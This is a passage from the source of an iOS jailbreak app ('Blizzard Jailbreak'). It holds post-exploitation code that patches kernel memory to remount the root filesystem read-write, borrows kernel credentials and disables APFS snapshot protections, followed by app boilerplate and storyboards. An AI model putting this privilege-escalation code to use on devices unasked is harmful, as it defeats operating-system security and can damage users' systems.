uint64_t *vnode_ptr = (uint64_t *)malloc(8);
if (vnode_lookup(path, 0, vnode_ptr, get_vfs_context())) {
printf("ROOT FS REMOUNT: Unable to get vnode from path for %s\n", path);
free(vnode_ptr);
return -1;
}
else {
uint64_t vnode = *vnode_ptr;
free(vnode_ptr);
printf("GOT VNODE: 0x%llx\n", vnode);
return vnode;
}
}
BOOL remount1126() {
uint64_t rootfs_vnode = getVnodeAtPath("/");
printf("\nROOT FS REMOUNT: vnode of /: 0x%llx\n", rootfs_vnode);
uint64_t v_mount = rk64(rootfs_vnode + off_v_mount);
uint32_t v_flag = rk32(v_mount + off_mnt_flag);
printf("ROOT FS REMOUNT: Clearing FS Flags\n");
printf("ROOT FS REMOUNT: Flags before 0x%x\n", v_flag);
v_flag &= ~MNT_NOSUID;
v_flag &= ~MNT_RDONLY;
v_flag &= ~MNT_ROOTFS;
printf("ROOT FS REMOUNT: Flags after 0x%x\n", v_flag);
wk32(v_mount + off_mnt_flag, v_flag);
char *nmz = strdup("/dev/disk0s1s1");
int rv = mount("apfs", "/", MNT_UPDATE, (void *)&nmz);
free(nmz);
printf("ROOT FS REMOUNT: Remounting /, return value = %d\n", rv);
v_mount = rk64(rootfs_vnode + off_v_mount);
wk32(v_mount + off_mnt_flag, v_flag);
int fd = open("/RWTEST", O_RDONLY);
if (fd == -1) {
fd = creat("/RWTEST", 0777);
} else {
printf("ROOT FS REMOUNT: File already exists! Good!\n");
}
close(fd);
printf("ROOT FS REMOUNT: %s\n", [[NSFileManager defaultManager] fileExistsAtPath:@"/RWTEST"] ? "Successful!" : "FAILED!");
return [[NSFileManager defaultManager] fileExistsAtPath:@"/RWTEST"] ? YES : NO;
}
int remountRootFS() {
int rv = -1, ret = -1;
if (kCFCoreFoundationVersionNumber > 1451.51 && list_snapshots("/")) {
printf("****** DOING THE HARD REMOUNT ******\n");
shouldReboot = 1;
uint64_t devVnode = getVnodeAtPath("/dev/disk0s1s1");
if (devVnode == 0 || devVnode == -1){
printf("FAIL!\n");
return -1;
}
uint64_t specinfo = rk64(devVnode + off_v_specinfo);
wk32(specinfo + off_specflags, 0);
if ([[NSFileManager defaultManager] fileExistsAtPath:@"/var/rootfsmnt"])
rmdir("/var/rootfsmnt");
mkdir("/var/rootfsmnt", 0777);
chown("/var/rootfsmnt", 0, 0);
printf("ROOT FS REMOUNT: Temporarily setting kernel credentials\n");
uint64_t creds = copyPIDCredentials(getpid(), 0);
if (mountDevAtPathAsRW("/dev/disk0s1s1", "/var/rootfsmnt")) {
printf("ROOT FS REMOUNT: Error mounting root at %s\n", "/var/rootfsmnt");
}
else {
printf("ROOT FS REMOUNT: Disabling the APFS snapshot mitigations\n");
char *snap = find_system_snapshot();
if (snap && !renameAPFSSnapshot("/var/rootfsmnt", snap, "orig-fs")) {
rv = 0;
unmount("/var/rootfsmnt", 0);
rmdir("/var/rootfsmnt");
}
}
printf("ROOT FS REMOUNT: Restoring our credentials\n");
uint64_t proc_smp = proc_of_pid(getpid());
wk64(proc_smp + off_p_ucred, creds);
vnode_put(devVnode);
if (rv) {
printf("ROOT FS REMOUNT: Failed to disable the APFS snapshot mitigations\n");
}
else {
printf("ROOT FS REMOUNT: Disabled the APFS snapshot mitigations\n");
ret = 0;
}
}
else {
shouldReboot = 0;
ret = 0;
remount1126();
}
return ret;
}
extern char* const* environ;
int spawnBinaryWithArgs(NSURL *launchPath,NSArray *arguments) {
NSMutableArray *posixSpawnArguments=[arguments mutableCopy];
[posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0];
int argc=(int)posixSpawnArguments.count+1;
printf("Number of posix_spawn arguments: %d\n",argc);
char **args=(char**)calloc(argc,sizeof(char *));
for (int i=0; i<posixSpawnArguments.count; i++)
args[i]=(char *)[posixSpawnArguments[i]UTF8String];
printf("File exists at launch path: %d\n",[[NSFileManager defaultManager]fileExistsAtPath:launchPath.path]);
printf("Executing %s: %s\n",launchPath.path.UTF8String,arguments.description.UTF8String);
posix_spawn_file_actions_t action;
posix_spawn_file_actions_init(&action);
pid_t pid;
int status;
status = posix_spawn(&pid, launchPath.path.UTF8String, &action, NULL, args, environ);
if (status == 0) {
if (waitpid(pid, &status, 0) != -1) {
}
}
posix_spawn_file_actions_destroy(&action);
free(args);
return status;
}
int checkifFileExistsAndWait(const char *filename) {
int rv = 0;
rv = access(filename, F_OK);
for (int i = 0; !(i >= 100 || rv == 0); i++) {
usleep(100000);
rv = access(filename, F_OK);
}
return rv;
}
const char *systemSnapshot(char *bootHash) {
if (!bootHash) {
return NULL;
}
return [[NSString stringWithFormat:@APPLESNAP @"%s", bootHash] UTF8String];
}
int unjailbreakBlizzard(){
printf("Blizzard Unjailbreak: Temporarily setting kernel credentials\n");
uint64_t creds = copyPIDCredentials(getpid(), 0);
if (kCFCoreFoundationVersionNumber < 1452.23) {
int retval = fs_snapshot_rename(open("/", O_RDONLY, 0), "orig-fs", systemSnapshot(copyBootHash()), 0);
if (access("/var/MobileSoftwareUpdate/mnt1", F_OK)) {
int retv = mkdir("/var/MobileSoftwareUpdate/mnt1", 0755);
if (retv != 0){
printf("Blizzard Unjailbreak: Failed to unjailbreak. Cannot access /var/MobileSoftwareUpdate/mnt1\n");
printf("Blizzard Unjailbreak: Restoring our credentials\n");
uint64_t proc_smp = proc_of_pid(getpid());
wk64(proc_smp + off_p_ucred, creds);
return -1;
}
}
if (retval == 0){
printf("Blizzard Unjailbreak: Successfully restored the default APFS Snapshot!\n");
if (verifySnapshot("/", "orig-fs") == 1) {
retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", @"orig-fs", @"/", @"/var/MobileSoftwareUpdate/mnt1"]);
} else {
retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", [NSString stringWithFormat:@"%s", systemSnapshot(copyBootHash())], @"/", @"/var/MobileSoftwareUpdate/mnt1"]);
}
retval = checkifFileExistsAndWait("/var/MobileSoftwareUpdate/mnt1/sbin/launchd");
if (retval == 0){
retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@"/usr/bin/rsync"], @[@"-vaxcH", @"--progress", @"--delete-after", @"/var/MobileSoftwareUpdate/mnt1/.", @"/"]);
if (retval == 0){
printf("Blizzard Unjailbreak: Restoring our credentials\n");
uint64_t proc_smp = proc_of_pid(getpid());
wk64(proc_smp + off_p_ucred, creds);
return 0;
}
}
}
} else {
int retvalue = fs_snapshot_rename(open("/", O_RDONLY, 0), "orig-fs", systemSnapshot(copyBootHash()), 0);
if (retvalue == 0){
printf("Blizzard Unjailbreak: Restoring our credentials\n");
uint64_t proc_smp = proc_of_pid(getpid());
wk64(proc_smp + off_p_ucred, creds);
return 0;
}
}
return 0;
}
================================================
FILE: APFS Utilities/snapshot_tools.c
================================================
#import "../Kernel Utilities/kernel_utils.h"
#import "../PatchFinder/patchfinder64.h"
#import "../Exploits/sock_port/offsetof.h"
#import "../Exploits/sock_port/offsets.h"
#import <sys/snapshot.h>
#include "../Exploits/sock_port/include/IOKit/IOKitLib.h"
#import <stdlib.h>
#import <signal.h>
#import <sys/attr.h>
#include "snapshot_tools.h"
#include "../Blizzard Jailbreak/BlizzardSpawnerTools.h"
#include "../Blizzard Jailbreak/blizzardJailbreak.h"
typedef struct val_attrs {
uint32_t length;
attribute_set_t returned;
attrreference_t name_info;
} val_attrs_t;
int list_snapshots(const char *vol){
int dirfd = open(vol, O_RDONLY, 0);
if (dirfd < 0) {
perror("get_dirfd");
printf("List Snapshots: Failed to open file descriptor!\n");
return -1;
}
struct attrlist alist = { 0 };
char abuf[2048];
alist.commonattr = ATTR_BULK_REQUIRED;
int count = fs_snapshot_list(dirfd, &alist, &abuf[0], sizeof (abuf), 0);
if (count < 0) {
perror("fs_snapshot_list");
printf("List Snapshots: Failed to list Snapshots!\n");
return -1;
}
char *p = &abuf[0];
for (int i = 0; i < count; i++) {
char *field = p;
uint32_t len = *(uint32_t *)field;
field += sizeof (uint32_t);
attribute_set_t attrs = *(attribute_set_t *)field;
field += sizeof (attribute_set_t);
if (attrs.commonattr & ATTR_CMN_NAME) {
attrreference_t ar = *(attrreference_t *)field;
char *name = field + ar.attr_dataoffset;
field += sizeof (attrreference_t);
(void) printf("\t ->> %s\n", name);
}
p += len;
}
return (0);
}
char *copyBootHash() {
io_registry_entry_t chosen = IORegistryEntryFromPath(kIOMasterPortDefault, "IODeviceTree:/chosen");
unsigned char buf[1024];
uint32_t size = 1024;
char *hash;
if (chosen && chosen != -1) {
kern_return_t ret = IORegistryEntryGetProperty(chosen, "boot-manifest-hash", (char*)buf, &size);
IOObjectRelease(chosen);
if (ret) {
printf("List Snapshots: Unable to read boot-manifest-hash\n");
hash = NULL;
}
else {
char *result = (char*)malloc((2 * size) | 1);
memset(result, 0, (2 * size) | 1);
int i = 0;
while (i < size) {
unsigned char ch = buf[i];
sprintf(result + 2 * i++, "%02X", ch);
}
printf("List Snapshots: Hash: %s\n", result);
hash = strdup(result);
}
}
else {
printf("List Snapshots: Unable to get IODeviceTree:/chosen port\n");
hash = NULL;
}
return hash;
}
char *find_system_snapshot() {
const char *hash = copyBootHash();
size_t len = strlen(hash);
char *str = (char*)malloc(len + 29);
memset(str, 0, len + 29);
if (!hash) return 0;
sprintf(str, "com.apple.os.update-%s", hash);
printf("List Snapshots: System snapshot: %s\n", str);
return str;
}
int createNewAPFSSnapshot(const char *volume, const char *snapshot) {
int retvalue;
printf("APFS Utilities: Preparing to create a new Snapshot...\n");
int fileDescriptor = get_dirfd(volume);
if (fileDescriptor < 0) {
perror("open");
printf("APFS Utilities: Failed to create a Snapshot! Error at get_dirfd.\n");
return -1;
}
retvalue = fs_snapshot_create(fileDescriptor, snapshot, 0);
close(fileDescriptor);
if (retvalue != 0) {
perror("fs_snapshot_create");
printf("APFS Utilities: Failed to create a Snapshot! Error at fs_snapshot_create()\n");
return -1;
}
return 0;
}
int renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw) {
int retvalue;
int fileDescriptor = open(volume, O_RDONLY);
if (fileDescriptor < 0) {
perror("open");
printf("APFS Utilities: RENAME: Cannot open file descriptor.\n");
return -1;
}
retvalue = fs_snapshot_rename(fileDescriptor, snapshot, nw, 0);
close(fileDescriptor);
if (retvalue != 0) {
perror("fs_snapshot_rename\n");
printf("APFS Utilities: RENAME: Failed to rename a Snapshot! Error at fs_snapshot_rename()\n");
}
return 0;
}
int verifySnapshot(const char *vol, const char *name){
struct attrlist attr_list = { 0 };
attr_list.commonattr = ATTR_BULK_REQUIRED;
char *buf = (char*)calloc(2048, sizeof(char));
int retcount;
int fd = open(vol, O_RDONLY, 0);
while ((retcount = fs_snapshot_list(fd, &attr_list, buf, 2048, 0))>0) {
char *bufref = buf;
for (int i=0; i<retcount; i++) {
val_attrs_t *entry = (val_attrs_t *)bufref;
if (entry->returned.commonattr & ATTR_CMN_NAME) {
printf("%s\n", (char*)(&entry->name_info) + entry->name_info.attr_dataoffset);
if (strstr((char*)(&entry->name_info) + entry->name_info.attr_dataoffset, name)){
return 1;
}
}
bufref += entry->length;
}
}
free(buf);
close(fd);
if (retcount < 0) {
perror("fs_snapshot_list");
printf("List Snapshots: Failed to list snapshots!\n");
return -1;
}
return 0;
}
int mountSnapshot(const char *vol, const char *name, const char *dir) {
int proces_pid;
proces_pid = launchProcessFrozen("/sbin/mount_apfs", "-s", (char *)name, (char *)vol, (char *)dir, NULL, NULL, NULL);
copyPIDCredentials(proces_pid, 0);
kill(proces_pid, SIGCONT);
int a;
if (proces_pid != -1) waitpid(proces_pid, &a, 0);
return WEXITSTATUS(a);
}
================================================
FILE: APFS Utilities/snapshot_tools.h
================================================
#ifndef apfs_util_h
#define apfs_util_h
#define get_dirfd(vol) open(vol, O_RDONLY, 0)
char *find_snapshot_with_ref(const char *vol, const char *ref);
char *find_system_snapshot(void);
int createNewAPFSSnapshot(const char *volume, const char *snapshot);
int renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw);
int list_snapshots(const char *vol);
int check_snapshot(const char *vol, const char *snap);
char *copyBootHash(void);
int renameAPFSSnapshot(const char *vol, const char *snap, const char *nw);
int verifySnapshot(const char *vol, const char *name);
#endif
/* apfs_util_h */
================================================
FILE: Blizzard Jailbreak/AppDelegate.h
================================================
//
// AppDelegate.h
// sock_port
//
// Created by Jake James on 7/17/19.
// Copyright © 2019 Jake James. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface AppDelegate : UIResponder <UIApplicationDelegate>
@property (strong, nonatomic) UIWindow *window;
@end
================================================
FILE: Blizzard Jailbreak/AppDelegate.m
================================================
//
// AppDelegate.m
// sock_port
//
// Created by Jake James on 7/17/19.
// Copyright © 2019 Jake James. All rights reserved.
//
#import "AppDelegate.h"
@interface AppDelegate ()
@end
@implementation AppDelegate
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
return YES;
}
- (void)applicationWillResignActive:(UIApplication *)application {
// Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
// Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
}
- (void)applicationDidEnterBackground:(UIApplication *)application {
// Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
// If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
}
- (void)applicationWillEnterForeground:(UIApplication *)application {
// Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
}
- (void)applicationDidBecomeActive:(UIApplication *)application {
// Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
}
- (void)applicationWillTerminate:(UIApplication *)application {
// Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
}
@end
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/AppIcon.appiconset/Contents.json
================================================
{
"images" : [
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "notification-icon@2x.png",
"scale" : "2x"
},
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "notification-icon@3x.png",
"scale" : "3x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "icon-small.png",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "icon-small@2x.png",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "icon-small@3x.png",
"scale" : "3x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "icon-40@2x.png",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "icon-40@3x.png",
"scale" : "3x"
},
{
"size" : "57x57",
"idiom" : "iphone",
"filename" : "icon.png",
"scale" : "1x"
},
{
"size" : "57x57",
"idiom" : "iphone",
"filename" : "icon@2x.png",
"scale" : "2x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "icon-60@2x.png",
"scale" : "2x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "icon-60@3x.png",
"scale" : "3x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "notification-icon~ipad.png",
"scale" : "1x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "notification-icon~ipad@2x.png",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "icon-small.png",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "icon-small@2x.png",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "icon-40.png",
"scale" : "1x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "icon-40@2x.png",
"scale" : "2x"
},
{
"size" : "50x50",
"idiom" : "ipad",
"filename" : "icon-small-50.png",
"scale" : "1x"
},
{
"size" : "50x50",
"idiom" : "ipad",
"filename" : "icon-small-50@2x.png",
"scale" : "2x"
},
{
"size" : "72x72",
"idiom" : "ipad",
"filename" : "icon-72.png",
"scale" : "1x"
},
{
"size" : "72x72",
"idiom" : "ipad",
"filename" : "icon-72@2x.png",
"scale" : "2x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "icon-76.png",
"scale" : "1x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "icon-76@2x.png",
"scale" : "2x"
},
{
"size" : "83.5x83.5",
"idiom" : "ipad",
"filename" : "icon-83.5@2x.png",
"scale" : "2x"
},
{
"size" : "1024x1024",
"idiom" : "ios-marketing",
"filename" : "ios-marketing.png",
"scale" : "1x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/Contents.json
================================================
{
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/button_mask.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "button_mask.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "button_mask-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "button_mask-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/jailbreak_wallpaper.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "jailbreak_wallpaper.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "jailbreak_wallpaper-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "jailbreak_wallpaper-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/snow.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "snow.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "snow-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "snow-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Assets.xcassets/winter.imageset/Contents.json
================================================
{
"images" : [
{
"idiom" : "universal",
"filename" : "winter.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "winter-1.png",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "winter-2.png",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
================================================
FILE: Blizzard Jailbreak/Base.lproj/LaunchScreen.storyboard
================================================
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="14460.31" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="01J-lp-oVM">
<device id="retina4_0" orientation="portrait">
<adaptation id="fullscreen"/>
</device>
<dependencies>
<deployment identifier="iOS"/>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="14460.20"/>
<capability name="Safe area layout guides" minToolsVersion="9.0"/>
<capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
</dependencies>
<scenes>
<!--View Controller-->
<scene sceneID="EHf-IW-A2E">
<objects>
<viewController id="01J-lp-oVM" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="jailbreak_wallpaper" translatesAutoresizingMaskIntoConstraints="NO" id="7k9-n9-bzj">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
</imageView>
<imageView userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="jb4-3I-IKu">
<rect key="frame" x="62" y="180" width="196" height="208"/>
<constraints>
<constraint firstAttribute="width" constant="196" id="lWd-Ki-AVK"/>
<constraint firstAttribute="height" constant="208" id="sRV-19-hKJ"/>
</constraints>
</imageView>
</subviews>
<color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstItem="7k9-n9-bzj" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" id="9dU-lB-Nhq"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="bottom" secondItem="jb4-3I-IKu" secondAttribute="bottom" constant="180" id="9rq-KG-m8u"/>
<constraint firstItem="7k9-n9-bzj" firstAttribute="trailing" secondItem="6Tk-OE-BBY" secondAttribute="trailing" id="Jed-NM-vvM"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="jb4-3I-IKu" secondAttribute="trailing" constant="62" id="Mx7-B6-Tcn"/>
<constraint firstAttribute="bottom" secondItem="7k9-n9-bzj" secondAttribute="bottom" id="b8b-ot-z8g"/>
<constraint firstItem="jb4-3I-IKu" firstAttribute="top" secondItem="6Tk-OE-BBY" secondAttribute="top" constant="160" id="bdZ-qC-bvW"/>
<constraint firstItem="7k9-n9-bzj" firstAttribute="top" secondItem="Ze5-6b-2t3" secondAttribute="top" id="d7b-ZU-nBc"/>
<constraint firstItem="jb4-3I-IKu" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="62" id="gBS-ew-kDl"/>
</constraints>
<viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
</view>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="50.625" y="372.88732394366195"/>
</scene>
</scenes>
<resources>
<image name="jailbreak_wallpaper" width="834" height="1194"/>
<image name="winter" width="256" height="256"/>
</resources>
</document>
================================================
FILE: Blizzard Jailbreak/Base.lproj/Main.storyboard
================================================
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="14460.31" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="BYZ-38-t0r">
<device id="retina4_0" orientation="portrait">
<adaptation id="fullscreen"/>
</device>
<dependencies>
<deployment identifier="iOS"/>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="14460.20"/>
<capability name="Safe area layout guides" minToolsVersion="9.0"/>
<capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
</dependencies>
<scenes>
<!--Blizzard View-->
<scene sceneID="tne-QT-ifu">
<objects>
<viewController id="BYZ-38-t0r" customClass="blizzardView" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="8bC-Xf-vdC">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="jailbreak_wallpaper" adjustsImageSizeForAccessibilityContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="IMk-rn-peb">
<rect key="frame" x="0.0" y="0.0" width="320" height="602"/>
</imageView>
<imageView userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="Suw-j9-Sy3">
<rect key="frame" x="32" y="34" width="256" height="150"/>
<constraints>
<constraint firstAttribute="height" constant="150" id="4cz-MJ-nsh"/>
<constraint firstAttribute="height" constant="150" id="veZ-H9-MjK"/>
</constraints>
</imageView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="by GeoSn0w (@FCE365)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontForContentSizeCategory="YES" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="2nt-NA-u5V">
<rect key="frame" x="30" y="527" width="260" height="21"/>
<constraints>
<constraint firstAttribute="height" constant="21" id="r0k-jY-g8T"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="17"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="BLIZZARD JAILBREAK" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontForContentSizeCategory="YES" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fV6-tC-CJz">
<rect key="frame" x="30" y="190" width="260" height="29"/>
<constraints>
<constraint firstAttribute="height" constant="29" id="ZrZ-fC-3IJ"/>
</constraints>
<fontDescription key="fontDescription" type="system" weight="light" pointSize="24"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<button opaque="NO" alpha="0.84999999999999998" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ZQt-HB-KcQ">
<rect key="frame" x="40" y="260" width="240" height="48"/>
<constraints>
<constraint firstAttribute="height" constant="48" id="n5b-aE-1UC"/>
</constraints>
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
<state key="normal" title="JAILBREAK" backgroundImage="button_mask">
<color key="titleColor" cocoaTouchSystemColor="darkTextColor"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<variation key="heightClass=regular-widthClass=regular">
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
</variation>
<connections>
<action selector="blizzardInit:" destination="BYZ-38-t0r" eventType="touchUpInside" id="Jh7-HL-oQs"/>
</connections>
</button>
<button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="Lg7-ka-Z5I">
<rect key="frame" x="103" y="329.5" width="114" height="38"/>
<constraints>
<constraint firstAttribute="height" constant="38" id="AWs-yW-e2p"/>
</constraints>
<state key="normal" title="Settings" backgroundImage="button_mask">
<color key="titleColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<connections>
<action selector="injectSettingsUI:" destination="BYZ-38-t0r" eventType="touchUpInside" id="1dX-EC-0pA"/>
</connections>
</button>
</subviews>
<color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstItem="fV6-tC-CJz" firstAttribute="top" secondItem="Suw-j9-Sy3" secondAttribute="bottom" constant="6" id="3Xc-Yf-VaY"/>
<constraint firstItem="IMk-rn-peb" firstAttribute="trailing" secondItem="6Tk-OE-BBY" secondAttribute="trailing" id="5Rf-lp-HFr"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="top" secondItem="Suw-j9-Sy3" secondAttribute="bottom" constant="76" id="8VU-CU-HbD"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="40" id="CEp-oy-DxF"/>
<constraint firstItem="IMk-rn-peb" firstAttribute="top" secondItem="8bC-Xf-vdC" secondAttribute="top" id="COe-Os-yxH"/>
<constraint firstItem="fV6-tC-CJz" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="30" id="Cdz-ud-Ycy"/>
<constraint firstItem="Lg7-ka-Z5I" firstAttribute="top" secondItem="ZQt-HB-KcQ" secondAttribute="bottom" constant="21.5" id="CvP-Ok-6ZK"/>
<constraint firstItem="Suw-j9-Sy3" firstAttribute="centerY" secondItem="8bC-Xf-vdC" secondAttribute="centerY" constant="-175" id="HOt-q2-t22"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="ZQt-HB-KcQ" secondAttribute="trailing" constant="40" id="SSW-cU-K2f"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="bottom" secondItem="2nt-NA-u5V" secondAttribute="bottom" constant="20" id="TkI-sm-9oq"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="centerY" secondItem="8bC-Xf-vdC" secondAttribute="centerY" id="WqY-g3-Csa"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="fV6-tC-CJz" secondAttribute="trailing" constant="30" id="Wxw-hN-w3e"/>
<constraint firstItem="Suw-j9-Sy3" firstAttribute="centerX" secondItem="8bC-Xf-vdC" secondAttribute="centerX" id="aLV-fL-jbw"/>
